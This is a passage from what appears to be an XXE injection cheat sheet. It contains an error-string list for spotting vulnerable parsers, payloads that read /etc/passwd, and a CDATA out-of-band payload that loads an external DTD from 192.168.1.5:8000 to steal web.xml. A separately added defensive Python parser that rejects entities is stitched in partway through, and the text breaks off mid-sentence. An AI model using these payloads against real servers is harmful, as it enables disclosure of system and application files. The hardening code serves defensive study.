simplexml_load_string|parser error :|An error occured!|xmlParseEntityDecl|simplexml_load_string|xmlParseInternalSubset|DOCTYPE improperly terminated|Start tag expected|No declaration for attribute|No declaration for element|failed to load external entity|Start tag expected|Invalid URI: file:\/\/\/|Malformed declaration expecting version|Unicode strings with encoding|must be well-formed|Content is not allowed in prolog|org.xml.sax|SAXParseException|com.sun.org.apache.xerces|ParseError|nokogiri|REXML|XML syntax error on line|Error unmarshaling XML|conflicts with field|illegal character code|XML Parsing Error|SyntaxError|no root element|not well-formed
Payload
<!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [<!ELEMENT foo ANY><!ENTITY xxe_test SYSTEM "file:///etc/passwd">]><foo>&xxe_test;</foo>
XML External Entity (XXE) Injection Tips
XML Entities
Internal Entities
<!ENTITY name "entity_value">
# Example
<!ENTITY test "<entity-value>test value</entity-value>">
External Entities
Private external entity
<!ENTITY name SYSTEM "URI">
# Example of private external entity
<!ENTITY textinfo SYSTEM "http://domain.com">
Public External Entity
<!ENTITY name PUBLIC "public_id" "URI">
# Example
<!ENTITY textinfo PUBLIC "-//W3C//TEXT orginfo//EN" "https://www.domain.com/orginfo.xml">
Parameter Entities (%)
<!ENTITY % name SYSTEM "URI">
# Example
<!ENTITY % course 'Breakfast'>
<!ENTITY Title 'Bacon &amp; Eggs would be my %course;'>
Unparsed External Entities
<!ENTITY name SYSTEM "URI" NDATA TYPE>
<!ENTITY name PUBLIC "public_id" "URI" NDATA TYPE>
Test Payload
Using an internal entity
<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY cat "Tom">
]>
<Contact>
<lastName>&cat;</lastName>
<firstName>Jerry</firstName>
</Contact>
Using a private (SYSTEM) external entity
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<Contact>
<lastName>&lastname;</lastName>
<firstName>Jerry</firstName>
</Contact>
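A defensive counterpart to the test payloads above, added here and not code from the original page: a stdlib-only parser (xml.parsers.expat) that refuses any DOCTYPE, entity declaration or external entity reference in untrusted input, shown beside the permissive mode that silently expands the internal entity. The sample documents are constructed for the example.

```python
import xml.parsers.expat as expat

# Constructed sample inputs: a benign document, the internal-entity test payload
# and the external-entity test payload from the sections above.
BENIGN_XML = b"<Contact><lastName>Tom</lastName><firstName>Jerry</firstName></Contact>"
ENTITY_XML = (b'<?xml version="1.0"?><!DOCTYPE data [ <!ELEMENT data ANY>'
              b'<!ENTITY cat "Tom"> ]><Contact><lastName>&cat;</lastName>'
              b'<firstName>Jerry</firstName></Contact>')
EXTERNAL_XML = (b'<!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]>'
                b'<x>&xxe_test;</x>')


class XXERejected(ValueError):
    """Untrusted XML carried a DOCTYPE, an entity declaration or an external reference."""


def parse_xml(data: bytes, harden: bool = True) -> dict:
    """Return {leaf_element: text}. With harden=True, every construct the XXE
    payloads depend on aborts the parse instead of being honoured."""
    parser = expat.ParserCreate()
    result, stack = {}, []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise XXERejected(f"DOCTYPE {name!r} is not allowed in untrusted input")

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise XXERejected(f"{'parameter' if is_param else 'general'} entity {name!r} declared")

    def refuse_external(context, base, sysid, pubid):
        return 0  # a false return makes expat abort instead of fetching sysid

    def text(chunk):
        if stack and chunk.strip():  # accumulate text under the innermost element
            result[stack[-1]] = result.get(stack[-1], "") + chunk

    if harden:
        parser.StartDoctypeDeclHandler = reject_doctype
        parser.EntityDeclHandler = reject_entity
        parser.ExternalEntityRefHandler = refuse_external
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = text
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:  # malformed input is rejected as well
        raise XXERejected(f"malformed XML: {exc}") from None
    return result


def rejects(data: bytes) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        parse_xml(data)
    except XXERejected:
        return True
    return False
```

With `harden=False` the internal-entity payload parses to the same result as the benign document, which is exactly why an application cannot tell from the output alone that entity expansion took place.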
CDATA
XXE that can return XML files by wrapping their content in a CDATA section:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/myapp/WEB-INF/web.xml" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.1.5:8000/wrapper.dtd" >
%dtd;
]>
<Contact>
<lastName>&wrapper;</lastName>
<firstName>FIRSTNAME_FILLER</firstName>
</Contact>
Inside the wrapper.dtd (the external DTD file)
Its purpose is just to wrap the variables (parameters) into 1